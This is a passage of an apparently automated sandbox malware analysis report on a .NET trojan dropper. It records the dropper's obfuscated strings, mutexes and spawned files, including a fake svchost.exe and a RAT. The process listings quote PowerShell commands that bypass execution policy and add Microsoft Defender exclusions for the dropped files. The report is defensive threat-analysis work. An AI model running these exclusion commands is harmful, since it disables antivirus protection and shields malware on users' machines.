                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.csBase64 encoded string: 'mZBklaBWm08euRJqmtsqX3PuQUAQT5fchbQUhcP279tD6zmf5w0e4N9t', 'Pu7kUSpyB4BYdPOye5qi98J7axY1Nt30ihlbUrKrZWnyk9xK3V0uEfzJbAo0s5mwR6ujRJw5EbZflppsx2Q984bw', 'sojEM3B5EexPDAVjDWmRL6Yadx5f1XYmvSL1qKoujNtlQwPge3To5QMAs1yMcATzpuHlGZEqpQeDUoK1Xf8KQmfm', 'YEHTaPd9FVBKwo0E7PXqFlXIzfMi9Rmq32o1kYivp8ZIOcJA8yR47SAnJVVsxbgnH3wme3feJV8lpfQlIiWO6ALM', 'kkHhXX051a3gpiPupsQNf30F4SU89d1QOoFIA085KTcICiNsYZFHDZlFMfkcvDTl5wLcaUwaMQQ9KJGpuvOlI6L7', 'LsyUhNvE5g9lIsC61umtByp0t3ZYkcm1hl2vnCnoSrLtHIqMBG0ri8Ufq2FQgAljcEFuQ0QUYNN5b1gbyKTmAj6h', 'zdavuI6sfeyoYHnvo9qgbloldzSljDFYcZbaUJq324XCrIg22sgwridfyD20I3DjQ3HpeADQjkugX2EH8AHmQ1yB', 's8qygpQLMfOkQ8IgdLbrKb6PYwJral20ux7fTwhHp0BIbI8iDTVtMWWUh2Zu5Nkcv47FyI0aV8V0aqYXwLpvfiry'
                        Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csBase64 encoded string: 'KDTMoiaSZ5c8ZQ9KQi2uj4VTuY2OWhGzT92KhRGCxZDNotkS3svU2uDz', 'KzCpsWR6Whp3cZNkUj2HZPotOzdPQyQxRdsMcYo8F7afHZBBtMwpZOs0', 'UEiG18CdkGb8gz3KRe55sVZX7NbSBFFqcSVglGFchDY7nuesfPcTUuj4', 'HnEG2DFHTDsHsB4UNdrf19LfgTw86vjpCWlyHpQy0t7yjCQ5VzMaXZqt', 'Y7QNdaF59YVq7qzL7GNR40Ymk8vfYu1qXSURY5jcfwBTX766ubO2TqKr', 'Lepl0LmBaH1OpzJSUVD4DSSytaLxB5gZLRXZV2rDdIWJdvOpwfC27gyO', 'IG38jOV7cpxsY5ymYgngAWQPcy0Z8d4Ht8vN5RXEoCZI5znaVxXiBbW0', 'N6GA93S1deERZSrGwmk6EETosqFoLnIuNn42rWSyDCihplcgM4L3ENy5', 'GXDPIdchf7ARbP8A1NcYL5WtvyBokT2q94uDbJAs5BStkWR63yEuOcQT', 'H7kOpcyYwJsi3a9wDTt1qDMorDpLsev8LAao3EUKQD4TL4l91wfnj4d1', 'jRA7djZ7giWhbdRW6ZzR2fgEu9WifON0dRoxCfIr3NZ1EZqzm48jSavC'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.csBase64 encoded string: 'mZBklaBWm08euRJqmtsqX3PuQUAQT5fchbQUhcP279tD6zmf5w0e4N9t', 'Pu7kUSpyB4BYdPOye5qi98J7axY1Nt30ihlbUrKrZWnyk9xK3V0uEfzJbAo0s5mwR6ujRJw5EbZflppsx2Q984bw', 'sojEM3B5EexPDAVjDWmRL6Yadx5f1XYmvSL1qKoujNtlQwPge3To5QMAs1yMcATzpuHlGZEqpQeDUoK1Xf8KQmfm', 'YEHTaPd9FVBKwo0E7PXqFlXIzfMi9Rmq32o1kYivp8ZIOcJA8yR47SAnJVVsxbgnH3wme3feJV8lpfQlIiWO6ALM', 'kkHhXX051a3gpiPupsQNf30F4SU89d1QOoFIA085KTcICiNsYZFHDZlFMfkcvDTl5wLcaUwaMQQ9KJGpuvOlI6L7', 'LsyUhNvE5g9lIsC61umtByp0t3ZYkcm1hl2vnCnoSrLtHIqMBG0ri8Ufq2FQgAljcEFuQ0QUYNN5b1gbyKTmAj6h', 'zdavuI6sfeyoYHnvo9qgbloldzSljDFYcZbaUJq324XCrIg22sgwridfyD20I3DjQ3HpeADQjkugX2EH8AHmQ1yB', 's8qygpQLMfOkQ8IgdLbrKb6PYwJral20ux7fTwhHp0BIbI8iDTVtMWWUh2Zu5Nkcv47FyI0aV8V0aqYXwLpvfiry'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csBase64 encoded string: 'KDTMoiaSZ5c8ZQ9KQi2uj4VTuY2OWhGzT92KhRGCxZDNotkS3svU2uDz', 'KzCpsWR6Whp3cZNkUj2HZPotOzdPQyQxRdsMcYo8F7afHZBBtMwpZOs0', 'UEiG18CdkGb8gz3KRe55sVZX7NbSBFFqcSVglGFchDY7nuesfPcTUuj4', 'HnEG2DFHTDsHsB4UNdrf19LfgTw86vjpCWlyHpQy0t7yjCQ5VzMaXZqt', 'Y7QNdaF59YVq7qzL7GNR40Ymk8vfYu1qXSURY5jcfwBTX766ubO2TqKr', 'Lepl0LmBaH1OpzJSUVD4DSSytaLxB5gZLRXZV2rDdIWJdvOpwfC27gyO', 'IG38jOV7cpxsY5ymYgngAWQPcy0Z8d4Ht8vN5RXEoCZI5znaVxXiBbW0', 'N6GA93S1deERZSrGwmk6EETosqFoLnIuNn42rWSyDCihplcgM4L3ENy5', 'GXDPIdchf7ARbP8A1NcYL5WtvyBokT2q94uDbJAs5BStkWR63yEuOcQT', 'H7kOpcyYwJsi3a9wDTt1qDMorDpLsev8LAao3EUKQD4TL4l91wfnj4d1', 'jRA7djZ7giWhbdRW6ZzR2fgEu9WifON0dRoxCfIr3NZ1EZqzm48jSavC'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.csBase64 encoded string: 'mZBklaBWm08euRJqmtsqX3PuQUAQT5fchbQUhcP279tD6zmf5w0e4N9t', 'Pu7kUSpyB4BYdPOye5qi98J7axY1Nt30ihlbUrKrZWnyk9xK3V0uEfzJbAo0s5mwR6ujRJw5EbZflppsx2Q984bw', 'sojEM3B5EexPDAVjDWmRL6Yadx5f1XYmvSL1qKoujNtlQwPge3To5QMAs1yMcATzpuHlGZEqpQeDUoK1Xf8KQmfm', 'YEHTaPd9FVBKwo0E7PXqFlXIzfMi9Rmq32o1kYivp8ZIOcJA8yR47SAnJVVsxbgnH3wme3feJV8lpfQlIiWO6ALM', 'kkHhXX051a3gpiPupsQNf30F4SU89d1QOoFIA085KTcICiNsYZFHDZlFMfkcvDTl5wLcaUwaMQQ9KJGpuvOlI6L7', 'LsyUhNvE5g9lIsC61umtByp0t3ZYkcm1hl2vnCnoSrLtHIqMBG0ri8Ufq2FQgAljcEFuQ0QUYNN5b1gbyKTmAj6h', 'zdavuI6sfeyoYHnvo9qgbloldzSljDFYcZbaUJq324XCrIg22sgwridfyD20I3DjQ3HpeADQjkugX2EH8AHmQ1yB', 's8qygpQLMfOkQ8IgdLbrKb6PYwJral20ux7fTwhHp0BIbI8iDTVtMWWUh2Zu5Nkcv47FyI0aV8V0aqYXwLpvfiry'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csBase64 encoded string: 'KDTMoiaSZ5c8ZQ9KQi2uj4VTuY2OWhGzT92KhRGCxZDNotkS3svU2uDz', 'KzCpsWR6Whp3cZNkUj2HZPotOzdPQyQxRdsMcYo8F7afHZBBtMwpZOs0', 'UEiG18CdkGb8gz3KRe55sVZX7NbSBFFqcSVglGFchDY7nuesfPcTUuj4', 'HnEG2DFHTDsHsB4UNdrf19LfgTw86vjpCWlyHpQy0t7yjCQ5VzMaXZqt', 'Y7QNdaF59YVq7qzL7GNR40Ymk8vfYu1qXSURY5jcfwBTX766ubO2TqKr', 'Lepl0LmBaH1OpzJSUVD4DSSytaLxB5gZLRXZV2rDdIWJdvOpwfC27gyO', 'IG38jOV7cpxsY5ymYgngAWQPcy0Z8d4Ht8vN5RXEoCZI5znaVxXiBbW0', 'N6GA93S1deERZSrGwmk6EETosqFoLnIuNn42rWSyDCihplcgM4L3ENy5', 'GXDPIdchf7ARbP8A1NcYL5WtvyBokT2q94uDbJAs5BStkWR63yEuOcQT', 'H7kOpcyYwJsi3a9wDTt1qDMorDpLsev8LAao3EUKQD4TL4l91wfnj4d1', 'jRA7djZ7giWhbdRW6ZzR2fgEu9WifON0dRoxCfIr3NZ1EZqzm48jSavC'
                        Source: Task Manager.exe.2.dr, vGttXPsprPl.csBase64 encoded string: 'y1comeOV4gcc87An4AtwdvhYcApZCf8QLd5bCNLmn6NwVDAQWfG6GbDD4jh7', 'JJaW4XFEKF88MD0kGW2d6ydpLwqBSjD30uakRZ4XONOXHYkUnYCRcD97mBBq', 'GwyfZgm8QAlCedZUa69SEXqVs8M6QHaVTIqvfFjDing4h3wUiU9srSTRps2d'
                        Source: Task Manager.exe.2.dr, bFPtK0txY2P.csBase64 encoded string: 'S6Ut6wXqTWGKPmYVDbRhtbIKt4li5XseFT5hk3d526rAPvn9714MonRl50Yd'
                        Source: Task Manager.exe.2.dr, xOmJpehc6ZQ.csBase64 encoded string: 'vsf0wtmMulVosBnH4u06IVFDHBudEZaTPdJX4DdC1oqqduAbYynIh6gCDKFB', 'iq7PjIWqNsEKpzL5ScfzFN9WNTj14zXghPTa4XjUf7KoLNWu17Viiiu6xY6Q', 'IRXoCF167gUghTh2FAa2dO05m7gTomJB8hvb1B0HbxugFfCGDr1qEN56ZcbA', 'k7eZFAstrV1tvnJFNk86x5yM9kT8BlR2SugUgysZPt356Z3gU1eOy8MXXSA0', 'WOJhyYxZ6AxSkNEpFfacZReR6v23LtukQ7hd6tHAxTlmDuJgINTs1Nk72nKR', 'ucKsEbsHxvhmrQGfbKKnRX6ywaN9tZjvoCSg7U1v2FKiCCnbhbJfZI6UaaOV', 'YPCR7KHUqVe1lWbHxG96a2DxOsFeUDtRHPNARlEdzi6oUuiDotvQza5vRSCK', 'Xr10KugX1a6EwuKCGSE7XLmPeCSaVwGoFH7lvR60whwLshiBMgxvCFL25zJz', 'HAHdnvm8SYwxUn4jtY5XO3EdPNFOtm1upZu3MlNoAtYKHnwBVEj4VF85yUTQ', 'Ud8tUHYcT0o4OlFm8ieXRYuzah7cUA5lz8l5EXPpFrPWKAmvA1sfw2Esgg5p', 'lMcNrjewT3YjmP0WBxnmyoUAC64nQ46AbEv5GTAopwUrcODTZ7IH1y361A3Q', 'mF4APDflhqCjzXTdMvljZ2BAUIflbgqy4cn9OcWBd49WOZQVwDBBpoJWxKJ7'
                        Source: Task Manager.exe.2.dr, 2syffmJ1FUx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Task Manager.exe.2.dr, 2syffmJ1FUx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@34/38@1/1
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeFile created: C:\Users\user\AppData\Roaming\All function.cmdJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeMutant created: \Sessions\1\BaseNamedObjects\3ermCMaZELzglIX9h
                        Source: C:\Users\user\AppData\Roaming\All function.cmdMutant created: \Sessions\1\BaseNamedObjects\6rWANPTakrMgPn7DP
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeMutant created: \Sessions\1\BaseNamedObjects\NvsfH1XO1syyGREn
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\All function.exeMutant created: \Sessions\1\BaseNamedObjects\prHEBzICljIZgj9Vw
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeMutant created: \Sessions\1\BaseNamedObjects\QGqDlUGtPZEL9zvP
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\d8q1JAoTE3NwBrSB
                        Source: C:\Users\user\AppData\Roaming\All function.exeFile created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeJump to behavior
                        Source: dLRcE11Dkl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: dLRcE11Dkl.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: dLRcE11Dkl.exeReversingLabs: Detection: 68%
                        Source: unknownProcess created: C:\Users\user\Desktop\dLRcE11Dkl.exe "C:\Users\user\Desktop\dLRcE11Dkl.exe"
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd"
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe"
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe"
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd" Jump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: appresolver.dllJump to behavior
